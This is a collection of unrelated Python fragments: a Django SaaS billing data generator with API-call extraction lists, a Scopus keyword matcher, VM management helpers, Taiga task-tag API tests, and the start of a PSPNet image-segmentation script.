processor_key=str(transaction_item.pk),
# XXX We can't do that yet because of
# ``PROCESSOR_BACKEND.charge_distribution(self)``
# unit=transaction_item.dest_unit,
state=Charge.CREATED)
charge.created_at = transaction_item.created_at
charge.save()
ChargeItem.objects.create(
invoiced=transaction_item, charge=charge)
charge.payment_successful()
churned = all_subscriptions.exclude(
pk__in=[subscription.pk for subscription in subscriptions])
for subscription in churned:
subscription.ends_at = end_period
subscription.save()
self.stdout.write("%d new and %d churned customers at %s" % (
nb_new_customers, nb_churn_customers, end_period))
| [
"logging.getLogger",
"datetime.datetime",
"saas.models.Transaction.objects.new_subscription_order",
"saas.utils.datetime_or_now",
"datetime.datetime.utcnow",
"saas.managers.metrics.month_periods",
"datetime.datetime.strptime",
"saas.models.Organization.objects.filter",
"saas.models.ChargeItem.objects.create",
"saas.models.Organization.objects.get",
"datetime.timedelta",
"saas.models.Plan.objects.filter",
"saas.models.get_broker",
"saas.models.Organization.objects.get_or_create",
"saas.models.Subscription.objects.filter",
"random.randint",
"saas.models.Plan.objects.get_or_create"
]
| [((1800, 1827), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1817, 1827), False, 'import datetime, logging, random\n'), ((4443, 4511), 'datetime.datetime', 'datetime.datetime', ([], {'year': 'from_date.year', 'month': 'from_date.month', 'day': '(1)'}), '(year=from_date.year, month=from_date.month, day=1)\n', (4460, 4511), False, 'import datetime, logging, random\n'), ((4682, 4694), 'saas.models.get_broker', 'get_broker', ([], {}), '()\n', (4692, 4694), False, 'from saas.models import Plan, Transaction, get_broker\n'), ((4703, 4949), 'saas.models.Plan.objects.get_or_create', 'Plan.objects.get_or_create', ([], {'slug': '"""basic"""', 'defaults': "{'title': 'Basic', 'description': 'Basic Plan', 'period_amount': 24900,\n 'broker_fee_percent': 0, 'period_type': 4, 'advance_discount': 1000,\n 'organization': broker, 'is_active': True}"}), "(slug='basic', defaults={'title': 'Basic',\n 'description': 'Basic Plan', 'period_amount': 24900,\n 'broker_fee_percent': 0, 'period_type': 4, 'advance_discount': 1000,\n 'organization': broker, 'is_active': True})\n", (4729, 4949), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((5109, 5332), 'saas.models.Plan.objects.get_or_create', 'Plan.objects.get_or_create', ([], {'slug': '"""medium"""', 'defaults': "{'title': 'Medium', 'description': 'Medium Plan', 'period_amount': 24900,\n 'broker_fee_percent': 0, 'period_type': 4, 'organization': broker,\n 'is_active': True}"}), "(slug='medium', defaults={'title': 'Medium',\n 'description': 'Medium Plan', 'period_amount': 24900,\n 'broker_fee_percent': 0, 'period_type': 4, 'organization': broker,\n 'is_active': True})\n", (5135, 5332), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((5476, 5726), 'saas.models.Plan.objects.get_or_create', 'Plan.objects.get_or_create', ([], {'slug': '"""premium"""', 'defaults': "{'title': 'Premium', 'description': 'Premium Plan', 'period_amount': 18900,\n 'broker_fee_percent': 0, 'period_type': 4, 'advance_discount': 81,\n 'organization': broker, 'is_active': True}"}), "(slug='premium', defaults={'title': 'Premium',\n 'description': 'Premium Plan', 'period_amount': 18900,\n 'broker_fee_percent': 0, 'period_type': 4, 'advance_discount': 81,\n 'organization': broker, 'is_active': True})\n", (5502, 5726), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((5972, 6022), 'saas.models.Organization.objects.get', 'Organization.objects.get', ([], {'slug': "options['provider']"}), "(slug=options['provider'])\n", (5996, 6022), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((6043, 6084), 'saas.models.Organization.objects.get', 'Organization.objects.get', ([], {'pk': 'PROCESSOR_ID'}), '(pk=PROCESSOR_ID)\n', (6067, 6084), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((6111, 6145), 'saas.managers.metrics.month_periods', 'month_periods', ([], {'from_date': 'from_date'}), '(from_date=from_date)\n', (6124, 6145), False, 'from saas.managers.metrics import month_periods\n'), ((4566, 4613), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['args[0]', '"""%Y-%m-%d"""'], {}), "(args[0], '%Y-%m-%d')\n", (4592, 4613), False, 'import datetime, logging, random\n'), ((6178, 6198), 'random.randint', 'random.randint', (['(0)', '(9)'], {}), '(0, 9)\n', (6192, 6198), False, 'import datetime, logging, random\n'), ((7904, 7960), 
'saas.models.Subscription.objects.filter', 'Subscription.objects.filter', ([], {'plan__organization': 'provider'}), '(plan__organization=provider)\n', (7931, 7960), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((4352, 4378), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (4376, 4378), False, 'import datetime, logging, random\n'), ((6272, 6335), 'saas.models.Plan.objects.filter', 'Plan.objects.filter', ([], {'organization': 'provider', 'period_amount__gt': '(0)'}), '(organization=provider, period_amount__gt=0)\n', (6291, 6335), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((8282, 8302), 'random.randint', 'random.randint', (['(1)', '(6)'], {}), '(1, 6)\n', (8296, 8302), False, 'import datetime, logging, random\n'), ((8338, 8453), 'saas.models.Transaction.objects.new_subscription_order', 'Transaction.objects.new_subscription_order', (['subscription'], {'nb_natural_periods': 'nb_periods', 'created_at': 'end_period'}), '(subscription, nb_natural_periods\n =nb_periods, created_at=end_period)\n', (8380, 8453), False, 'from saas.models import Plan, Transaction, get_broker\n'), ((9527, 9594), 'saas.models.ChargeItem.objects.create', 'ChargeItem.objects.create', ([], {'invoiced': 'transaction_item', 'charge': 'charge'}), '(invoiced=transaction_item, charge=charge)\n', (9552, 9594), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((6989, 7055), 'saas.models.Organization.objects.get_or_create', 'Organization.objects.get_or_create', ([], {'slug': 'slug', 'full_name': 'full_name'}), '(slug=slug, full_name=full_name)\n', (7023, 7055), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((7421, 7464), 'saas.models.Organization.objects.filter', 'Organization.objects.filter', ([], {'pk': 'customer.id'}), '(pk=customer.id)\n', (7448, 7464), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((7709, 7756), 'saas.models.Subscription.objects.filter', 'Subscription.objects.filter', ([], {'pk': 'subscription.id'}), '(pk=subscription.id)\n', (7736, 7756), False, 'from saas.models import Charge, ChargeItem, Organization, Plan, Subscription\n'), ((9113, 9130), 'saas.utils.datetime_or_now', 'datetime_or_now', ([], {}), '()\n', (9128, 9130), False, 'from saas.utils import datetime_or_now\n'), ((7664, 7691), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(31)'}), '(days=31)\n', (7682, 7691), False, 'import datetime, logging, random\n'), ((6920, 6943), 'random.randint', 'random.randint', (['(1)', '(1000)'], {}), '(1, 1000)\n', (6934, 6943), False, 'import datetime, logging, random\n')] |
import os, sys, re
import json
import pandas as pd
import pymongo
from main.LOADERS.publication_loader import PublicationLoader
from main.MONGODB_PUSHERS.mongodb_pusher import MongoDbPusher
from main.NLP.PREPROCESSING.preprocessor import Preprocessor
class ScopusStringMatch_HAmodule():
def __init__(self):
self.loader = PublicationLoader()
self.mongodb_pusher = MongoDbPusher()
self.preprocessor = Preprocessor()
def __progress(self, count, total, custom_text, suffix=''):
"""
Visualises progress for a process given a current count and a total count
"""
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '*' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s %s %s\r' %(bar, percents, '%', custom_text, suffix))
sys.stdout.flush()
def __read_keywords(self, data: dict) -> None:
"""
Given a set of publications in a dictionary, performs pre-processing for all string type data fields.
        Performs look-up of HA keyword occurrences in a document.
        Results are pushed to MongoDB (backed up in a JSON file - scopus_matches_modules.json).
"""
resulting_data = {}
counter = 0
keywords = self.preprocessor.preprocess_keywords("main/HA_KEYWORDS/HA_Keywords.csv")
num_publications = len(data)
num_keywords = len(keywords)
for doi, publication in data.items():
# visualise the progress on a commandline
self.__progress(counter, num_publications, "processing scopus_matches.json")
counter += 1
description = self.preprocessor.tokenize(publication["Description"])
ha_occurences = {} # accumulator for HA Keywords found in a given document
for n in range(num_keywords):
ha_num = n + 1
ha = "HA " + str(ha_num) if ha_num < num_keywords else "Misc" # clean and process the string for documenting occurences
ha_occurences[ha] = {"Word_Found": []}
for keyword in keywords[n]:
if keyword in description:
ha_occurences[ha]["Word_Found"].append(keyword)
if len(ha_occurences[ha]["Word_Found"]) == 0:
                    ha_occurences.pop(ha, None) # clear out empty occurrences
resulting_data[doi] = {"DOI": doi, "Related_HA": ha_occurences}
print()
self.mongodb_pusher.matched_scopus(resulting_data) # push the processed data to MongoDB
print()
# Record the same data locally, acts as a backup
with open('main/NLP/STRING_MATCH/HA_MODULE_RESULTS/scopus_matches_modules.json', 'w') as outfile:
json.dump(resulting_data, outfile)
def run(self):
"""
        Controller method for this class
Loads modules from a pre-loaded pickle file
"""
data = self.loader.load_all()
self.__read_keywords(data) | [
"main.MONGODB_PUSHERS.mongodb_pusher.MongoDbPusher",
"main.LOADERS.publication_loader.PublicationLoader",
"main.NLP.PREPROCESSING.preprocessor.Preprocessor",
"sys.stdout.flush",
"json.dump",
"sys.stdout.write"
]
| [((354, 373), 'main.LOADERS.publication_loader.PublicationLoader', 'PublicationLoader', ([], {}), '()\n', (371, 373), False, 'from main.LOADERS.publication_loader import PublicationLoader\n'), ((405, 420), 'main.MONGODB_PUSHERS.mongodb_pusher.MongoDbPusher', 'MongoDbPusher', ([], {}), '()\n', (418, 420), False, 'from main.MONGODB_PUSHERS.mongodb_pusher import MongoDbPusher\n'), ((450, 464), 'main.NLP.PREPROCESSING.preprocessor.Preprocessor', 'Preprocessor', ([], {}), '()\n', (462, 464), False, 'from main.NLP.PREPROCESSING.preprocessor import Preprocessor\n'), ((865, 950), 'sys.stdout.write', 'sys.stdout.write', (["('[%s] %s%s %s %s\\r' % (bar, percents, '%', custom_text, suffix))"], {}), "('[%s] %s%s %s %s\\r' % (bar, percents, '%', custom_text,\n suffix))\n", (881, 950), False, 'import os, sys, re\n'), ((955, 973), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (971, 973), False, 'import os, sys, re\n'), ((2910, 2944), 'json.dump', 'json.dump', (['resulting_data', 'outfile'], {}), '(resulting_data, outfile)\n', (2919, 2944), False, 'import json\n')] |
from core.celery.config import ERIGONES_TASK_USER
from que.tasks import execute, get_task_logger
from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress
logger = get_task_logger(__name__)
def is_vm_missing(vm, msg):
"""
Check failed command output and return True if VM is not on compute node.
"""
check_str = vm.hostname + ': No such zone configured'
return check_str in msg
def vm_delete_snapshots_of_removed_disks(vm):
"""
This helper function deletes snapshots for VM with changing disk IDs. Bug #chili-363
++ Bug #chili-220 - removing snapshot and backup definitions for removed disks.
"""
removed_disk_ids = [Snapshot.get_real_disk_id(i) for i in vm.create_json_update_disks().get('remove_disks', [])]
if removed_disk_ids:
Snapshot.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
SnapshotDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
Backup.objects.filter(vm=vm, disk_id__in=removed_disk_ids, last=True).update(last=False)
BackupDefine.objects.filter(vm=vm, disk_id__in=removed_disk_ids).delete()
return removed_disk_ids
def _reset_allowed_ip_usage(vm, ip):
"""Helper function used below. It sets the IP usage back to VM [1] only if other VMs, which use the address in
allowed_ips are in notcreated state."""
if all(other_vm.is_notcreated() for other_vm in ip.vms.exclude(uuid=vm.uuid)):
ip.usage = IPAddress.VM
ip.save()
def _is_ip_ok(ip_queryset, vm_ip, vm_network_uuid):
"""Helper function used below. Return True if vm_ip (string) is "dhcp" or is found in the IPAddress queryset
and has the expected usage flag and subnet uuid."""
if vm_ip == 'dhcp':
return True
return any(ip.ip == vm_ip and ip.subnet.uuid == vm_network_uuid and ip.usage == IPAddress.VM_REAL
for ip in ip_queryset)
def vm_update_ipaddress_usage(vm):
"""
This helper function is responsible for updating IPAddress.usage and IPAddress.vm of server IPs (#chili-615,1029),
by removing association from IPs that, are not set on any NIC and:
- when a VM is deleted all IP usages are set to IPAddress.VM (in DB) and
- when a VM is created or updated all IP usages are set to IPAddress.VM_REAL (on hypervisor) and
Always call this function _only_ after vm.json_active is synced with vm.json!!!
    In order to properly understand this code you have to understand the association between an IPAddress and Vm model.
This function may raise a ValueError if the VM and IP address were not properly associated (e.g. via vm_define_nic).
"""
current_ips = set(vm.json_active_get_ips(primary_ips=True, allowed_ips=False))
current_ips.update(vm.json_get_ips(primary_ips=True, allowed_ips=False))
current_allowed_ips = set(vm.json_active_get_ips(primary_ips=False, allowed_ips=True))
current_allowed_ips.update(vm.json_get_ips(primary_ips=False, allowed_ips=True))
# Return old IPs back to IP pool, so they can be used again
vm.ipaddress_set.exclude(ip__in=current_ips).update(vm=None, usage=IPAddress.VM)
# Remove association of removed vm.allowed_ips
for ip in vm.allowed_ips.exclude(ip__in=current_allowed_ips):
ip.vms.remove(vm)
_reset_allowed_ip_usage(vm, ip)
if vm.is_notcreated():
# Server was deleted from hypervisor
vm.ipaddress_set.filter(usage=IPAddress.VM_REAL).update(usage=IPAddress.VM)
for ip in vm.allowed_ips.filter(usage=IPAddress.VM_REAL):
_reset_allowed_ip_usage(vm, ip)
return
# Server was updated or created
vm.ipaddress_set.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
vm.allowed_ips.filter(usage=IPAddress.VM).update(usage=IPAddress.VM_REAL)
# The VM configuration may be changed directly on the hypervisor, thus the VM could have
# new NICs and IP addresses which configuration bypassed our API - issue #168.
vm_ips = vm.ipaddress_set.select_related('subnet').filter(usage=IPAddress.VM_REAL)
vm_allowed_ips = vm.allowed_ips.select_related('subnet').filter(usage=IPAddress.VM_REAL)
# For issue #168 we have to check the VM<->IPAddress association in a loop for each NIC, because we need to
# match the NIC.network_uuid with a Subnet.
for nic_id, nic in enumerate(vm.json_active_get_nics(), 1):
network_uuid = nic.get('network_uuid', None)
if network_uuid:
ip = nic.get('ip', '')
allowed_ips = nic.get('allowed_ips', [])
if ip:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
for ip in allowed_ips:
logger.debug('VM: %s | NIC ID: %s | NIC network: %s | IP address: %s', vm, nic_id, network_uuid, ip)
if not _is_ip_ok(vm_allowed_ips, ip, network_uuid):
raise ValueError('VM %s NIC ID %s allowed IP address %s is not properly associated with VM!' %
(vm, nic_id, ip))
else:
raise ValueError('VM %s NIC ID %s does not have a network uuid!' % (vm, nic_id))
def vm_deploy(vm, force_stop=False):
"""
Internal API call used for finishing VM deploy;
Actually cleaning the json and starting the VM.
"""
if force_stop: # VM is running without OS -> stop
cmd = 'vmadm stop %s -F >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
else: # VM is stopped and deployed -> start
cmd = 'vmadm start %s >/dev/null 2>/dev/null; vmadm get %s 2>/dev/null' % (vm.uuid, vm.uuid)
msg = 'Deploy server'
lock = 'vmadm deploy ' + vm.uuid
meta = {
'output': {
'returncode': 'returncode',
'stderr': 'message',
'stdout': 'json'
},
'replace_stderr': ((vm.uuid, vm.hostname),),
'msg': msg, 'vm_uuid': vm.uuid
}
callback = ('api.vm.base.tasks.vm_deploy_cb', {'vm_uuid': vm.uuid})
return execute(ERIGONES_TASK_USER, None, cmd, meta=meta, lock=lock, callback=callback,
queue=vm.node.fast_queue, nolog=True, ping_worker=False, check_user_tasks=False)
def vm_reset(vm):
"""
Internal API call used for VM reboots in emergency situations.
"""
cmd = 'vmadm stop %s -F; vmadm start %s' % (vm.uuid, vm.uuid)
return execute(ERIGONES_TASK_USER, None, cmd, callback=False, queue=vm.node.fast_queue, nolog=True,
check_user_tasks=False)
def vm_update(vm):
"""
    Internal API used for updating the VM if changes in its json were detected.
"""
logger.info('Running PUT vm_manage(%s), because something (vnc port?) has changed', vm)
from api.vm.base.views import vm_manage
from api.utils.request import get_dummy_request
from api.utils.views import call_api_view
request = get_dummy_request(vm.dc, method='PUT', system_user=True)
res = call_api_view(request, 'PUT', vm_manage, vm.hostname)
if res.status_code == 201:
logger.warn('PUT vm_manage(%s) was successful: %s', vm, res.data)
else:
logger.error('PUT vm_manage(%s) failed: %s (%s): %s', vm, res.status_code, res.status_text, res.data)
| [
"vms.models.SnapshotDefine.objects.filter",
"vms.models.Snapshot.objects.filter",
"api.utils.request.get_dummy_request",
"que.tasks.get_task_logger",
"vms.models.Backup.objects.filter",
"que.tasks.execute",
"api.utils.views.call_api_view",
"vms.models.Snapshot.get_real_disk_id",
"vms.models.BackupDefine.objects.filter"
]
| [((188, 213), 'que.tasks.get_task_logger', 'get_task_logger', (['__name__'], {}), '(__name__)\n', (203, 213), False, 'from que.tasks import execute, get_task_logger\n'), ((6278, 6447), 'que.tasks.execute', 'execute', (['ERIGONES_TASK_USER', 'None', 'cmd'], {'meta': 'meta', 'lock': 'lock', 'callback': 'callback', 'queue': 'vm.node.fast_queue', 'nolog': '(True)', 'ping_worker': '(False)', 'check_user_tasks': '(False)'}), '(ERIGONES_TASK_USER, None, cmd, meta=meta, lock=lock, callback=\n callback, queue=vm.node.fast_queue, nolog=True, ping_worker=False,\n check_user_tasks=False)\n', (6285, 6447), False, 'from que.tasks import execute, get_task_logger\n'), ((6638, 6759), 'que.tasks.execute', 'execute', (['ERIGONES_TASK_USER', 'None', 'cmd'], {'callback': '(False)', 'queue': 'vm.node.fast_queue', 'nolog': '(True)', 'check_user_tasks': '(False)'}), '(ERIGONES_TASK_USER, None, cmd, callback=False, queue=vm.node.\n fast_queue, nolog=True, check_user_tasks=False)\n', (6645, 6759), False, 'from que.tasks import execute, get_task_logger\n'), ((7137, 7193), 'api.utils.request.get_dummy_request', 'get_dummy_request', (['vm.dc'], {'method': '"""PUT"""', 'system_user': '(True)'}), "(vm.dc, method='PUT', system_user=True)\n", (7154, 7193), False, 'from api.utils.request import get_dummy_request\n'), ((7204, 7257), 'api.utils.views.call_api_view', 'call_api_view', (['request', '"""PUT"""', 'vm_manage', 'vm.hostname'], {}), "(request, 'PUT', vm_manage, vm.hostname)\n", (7217, 7257), False, 'from api.utils.views import call_api_view\n'), ((686, 714), 'vms.models.Snapshot.get_real_disk_id', 'Snapshot.get_real_disk_id', (['i'], {}), '(i)\n', (711, 714), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n'), ((812, 872), 'vms.models.Snapshot.objects.filter', 'Snapshot.objects.filter', ([], {'vm': 'vm', 'disk_id__in': 'removed_disk_ids'}), '(vm=vm, disk_id__in=removed_disk_ids)\n', (835, 872), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n'), ((890, 956), 'vms.models.SnapshotDefine.objects.filter', 'SnapshotDefine.objects.filter', ([], {'vm': 'vm', 'disk_id__in': 'removed_disk_ids'}), '(vm=vm, disk_id__in=removed_disk_ids)\n', (919, 956), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n'), ((974, 1043), 'vms.models.Backup.objects.filter', 'Backup.objects.filter', ([], {'vm': 'vm', 'disk_id__in': 'removed_disk_ids', 'last': '(True)'}), '(vm=vm, disk_id__in=removed_disk_ids, last=True)\n', (995, 1043), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n'), ((1071, 1135), 'vms.models.BackupDefine.objects.filter', 'BackupDefine.objects.filter', ([], {'vm': 'vm', 'disk_id__in': 'removed_disk_ids'}), '(vm=vm, disk_id__in=removed_disk_ids)\n', (1098, 1135), False, 'from vms.models import SnapshotDefine, Snapshot, BackupDefine, Backup, IPAddress\n')] |
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# Copyright (C) 2014-2016 <NAME> <<EMAIL>>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from unittest import mock
from collections import OrderedDict
from django.core.urlresolvers import reverse
from taiga.base.utils import json
from .. import factories as f
import pytest
pytestmark = pytest.mark.django_db
def test_api_task_add_new_tags_with_error(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [],
"version": task.version
}
client.login(task.owner)
data["tags"] = [1]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [["back", "#cccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
data["tags"] = [[1, "#ccc"]]
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 400, response.data
assert "tags" in response.data
def test_api_task_add_new_tags_without_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", None],
["front", None],
["ux", None]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
def test_api_task_add_new_tags_with_colors(client):
project = f.ProjectFactory.create()
task = f.create_task(project=project, status__project=project, milestone=None, user_story=None)
f.MembershipFactory.create(project=project, user=task.owner, is_admin=True)
url = reverse("tasks-detail", kwargs={"pk": task.pk})
data = {
"tags": [
["back", "#fff8e7"],
["front", None],
["ux", "#fabada"]
],
"version": task.version
}
client.login(task.owner)
response = client.json.patch(url, json.dumps(data))
assert response.status_code == 200, response.data
tags_colors = OrderedDict(project.tags_colors)
assert not tags_colors.keys()
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert "back" in tags_colors and "front" in tags_colors and "ux" in tags_colors
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
def test_api_create_new_task_with_tags(client):
project = f.ProjectFactory.create(tags_colors=[["front", "#aaaaaa"], ["ux", "#fabada"]])
status = f.TaskStatusFactory.create(project=project)
project.default_task_status = status
project.save()
f.MembershipFactory.create(project=project, user=project.owner, is_admin=True)
url = reverse("tasks-list")
data = {
"subject": "Test user story",
"project": project.id,
"tags": [
["back", "#fff8e7"],
["front", "#bbbbbb"],
["ux", None]
]
}
client.login(project.owner)
response = client.json.post(url, json.dumps(data))
assert response.status_code == 201, response.data
task_tags_colors = OrderedDict(response.data["tags"])
assert task_tags_colors["back"] == "#fff8e7"
assert task_tags_colors["front"] == "#aaaaaa"
assert task_tags_colors["ux"] == "#fabada"
tags_colors = OrderedDict(project.tags_colors)
project.refresh_from_db()
tags_colors = OrderedDict(project.tags_colors)
assert tags_colors["back"] == "#fff8e7"
assert tags_colors["ux"] == "#fabada"
assert tags_colors["front"] == "#aaaaaa"
| [
"collections.OrderedDict",
"taiga.base.utils.json.dumps",
"django.core.urlresolvers.reverse"
]
| [((1402, 1449), 'django.core.urlresolvers.reverse', 'reverse', (['"""tasks-detail"""'], {'kwargs': "{'pk': task.pk}"}), "('tasks-detail', kwargs={'pk': task.pk})\n", (1409, 1449), False, 'from django.core.urlresolvers import reverse\n'), ((2547, 2594), 'django.core.urlresolvers.reverse', 'reverse', (['"""tasks-detail"""'], {'kwargs': "{'pk': task.pk}"}), "('tasks-detail', kwargs={'pk': task.pk})\n", (2554, 2594), False, 'from django.core.urlresolvers import reverse\n'), ((2918, 2950), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (2929, 2950), False, 'from collections import OrderedDict\n'), ((3035, 3067), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (3046, 3067), False, 'from collections import OrderedDict\n'), ((3436, 3483), 'django.core.urlresolvers.reverse', 'reverse', (['"""tasks-detail"""'], {'kwargs': "{'pk': task.pk}"}), "('tasks-detail', kwargs={'pk': task.pk})\n", (3443, 3483), False, 'from django.core.urlresolvers import reverse\n'), ((3816, 3848), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (3827, 3848), False, 'from collections import OrderedDict\n'), ((3933, 3965), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (3944, 3965), False, 'from collections import OrderedDict\n'), ((4489, 4510), 'django.core.urlresolvers.reverse', 'reverse', (['"""tasks-list"""'], {}), "('tasks-list')\n", (4496, 4510), False, 'from django.core.urlresolvers import reverse\n'), ((4887, 4921), 'collections.OrderedDict', 'OrderedDict', (["response.data['tags']"], {}), "(response.data['tags'])\n", (4898, 4921), False, 'from collections import OrderedDict\n'), ((5088, 5120), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (5099, 5120), False, 'from collections import OrderedDict\n'), ((5171, 5203), 'collections.OrderedDict', 'OrderedDict', (['project.tags_colors'], {}), '(project.tags_colors)\n', (5182, 5203), False, 'from collections import OrderedDict\n'), ((1613, 1629), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (1623, 1629), False, 'from taiga.base.utils import json\n'), ((1789, 1805), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (1799, 1805), False, 'from taiga.base.utils import json\n'), ((1974, 1990), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (1984, 1990), False, 'from taiga.base.utils import json\n'), ((2153, 2169), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (2163, 2169), False, 'from taiga.base.utils import json\n'), ((2826, 2842), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (2836, 2842), False, 'from taiga.base.utils import json\n'), ((3725, 3741), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (3735, 3741), False, 'from taiga.base.utils import json\n'), ((4791, 4807), 'taiga.base.utils.json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (4801, 4807), False, 'from taiga.base.utils import json\n')] |
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import os
import argparse
import logging
import numpy as np
from PIL import Image
import matplotlib
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from torchvision import transforms
import cv2
import tqdm
from net.pspnet import PSPNet
models = {
'squeezenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='squeezenet'),
'densenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend='densenet'),
'resnet18': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet18'),
'resnet34': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet34'),
'resnet50': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet50'),
'resnet101': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet101'),
'resnet152': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet152')
}
parser = argparse.ArgumentParser(description="Pyramid Scene Parsing Network")
parser.add_argument('--models-path', type=str, default='./checkpoints',
help='Path for storing model snapshots')
parser.add_argument('--backend', type=str,
default='densenet', help='Feature extractor')
parser.add_argument('--num-classes', type=int,
default=20, help="Number of classes.")
args = parser.parse_args()
def build_network(snapshot, backend):
epoch = 0
backend = backend.lower()
net = models[backend]()
net = nn.DataParallel(net)
if snapshot is not None:
_, epoch = os.path.basename(snapshot).split('_')
if not epoch == 'last':
epoch = int(epoch)
net.load_state_dict(torch.load(
snapshot, map_location=torch.device('cpu')))
logging.info(
"Snapshot for epoch {} loaded from {}".format(epoch, snapshot))
if torch.cuda.is_available():
net = net.cuda()
return net, epoch
def get_transform():
transform_image_list = [
# transforms.Resize((192, 256), 3),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
]
return transforms.Compose(transform_image_list)
def show_image(img, pred):
fig, axes = plt.subplots(1, 2)
ax0, ax1 = axes
ax0.get_xaxis().set_ticks([])
ax0.get_yaxis().set_ticks([])
ax1.get_xaxis().set_ticks([])
ax1.get_yaxis().set_ticks([])
classes = np.array(('Background', # always index 0
'Hat', 'Hair', 'Glove', 'Sunglasses',
'UpperClothes', 'Dress', 'Coat', 'Socks',
'Pants', 'Jumpsuits', 'Scarf', 'Skirt',
